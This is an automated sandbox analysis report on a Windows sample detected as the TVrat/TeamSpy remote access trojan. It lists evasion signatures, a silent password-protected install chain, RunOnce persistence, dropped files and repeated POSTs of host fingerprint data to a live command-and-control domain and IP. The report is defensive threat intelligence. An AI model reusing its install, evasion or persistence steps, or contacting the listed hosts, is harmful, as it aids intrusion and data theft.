Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aeyh21MAtA.exe

Overview

General Information

Sample name:aeyh21MAtA.exe
renamed because original name is a hash value
Original sample name:21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f.exe
Analysis ID:1558736
MD5:91444fbf43fbbb75b12dc51f3b5465ea
SHA1:1c81094998d5afa6c09ebd3ee14c4d99b56d729f
SHA256:21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f
Tags:crypto-st--artexeuser-JAMESWT_MHT
Infos:

Detection

TVrat
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected TVrat
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • aeyh21MAtA.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\aeyh21MAtA.exe" MD5: 91444FBF43FBBB75B12DC51F3B5465EA)
    • aeyh21MAtA.tmp (PID: 4320 cmdline: "C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" MD5: 7862449E145C354D01526B0F8FB3C283)
      • aeyh21MAtA.exe (PID: 940 cmdline: "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc MD5: 91444FBF43FBBB75B12DC51F3B5465EA)
        • aeyh21MAtA.tmp (PID: 3176 cmdline: "C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc MD5: 7862449E145C354D01526B0F8FB3C283)
          • cmd.exe (PID: 2300 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • xcopy.exe (PID: 5252 cmdline: xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • ast.exe (PID: 3380 cmdline: "C:\Users\user\AppData\Roaming\template\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 5408 cmdline: "C:\Users\user\AppData\Roaming\template\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 4672 cmdline: "C:\Users\user\AppData\Roaming\template\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TeamSpy, TVRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\template\ast.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Roaming\template\ast.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Roaming\template\ast.exeJoeSecurity_TVratYara detected TVratJoe Security
        C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 1 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_TVratYara detected TVratJoe Security
                Process Memory Space: ast.exe PID: 3380JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Process Memory Space: ast.exe PID: 3380JoeSecurity_TVratYara detected TVratJoe Security

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    10.0.ast.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      10.0.ast.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        10.0.ast.exe.400000.0.unpackJoeSecurity_TVratYara detected TVratJoe Security

                          Sigma Signatures

                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\template\ast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\template\ast.exe, ProcessId: 3380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ast

                          Suricata Signatures

                          No Suricata rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: aeyh21MAtA.exeAvira: detected
                          Multi AV Scanner detection for submitted file
                          Source: aeyh21MAtA.exeReversingLabs: Detection: 36%
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B778010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B778010
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7920A0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B7920A0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_07004ED6 CryptStringToBinaryA,CryptStringToBinaryA,11_2_07004ED6
                          Source: ast.exe, 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a26e66f5-e
                          Source: aeyh21MAtA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49986 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49989 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49995 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50001 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50004 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50007 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50010 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50013 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50016 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50019 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50025 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50028 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50031 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50034 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50040 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50043 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50046 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50049 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50052 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50055 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50058 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50064 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50067 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50070 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50073 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50076 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50079 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50082 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50085 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50088 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50091 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50094 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50097 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50100 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50103 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50106 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50109 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50112 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50115 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50118 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50121 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50124 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50127 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50130 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50133 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50139 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50142 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50145 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50148 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50151 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50154 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50160 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50163 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50166 version: TLS 1.2
                          Source: Binary string: vcruntime140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2447777452.000000000325D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3372819038.000000006BE10000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000008.00000003.2454654792.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_070025DB FindFirstFileA,FindNextFileA,FindClose,11_3_070025DB
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_070025DB lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070025DB
                          Source: global trafficTCP traffic: 192.168.2.5:49983 -> 212.193.169.65:44335
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
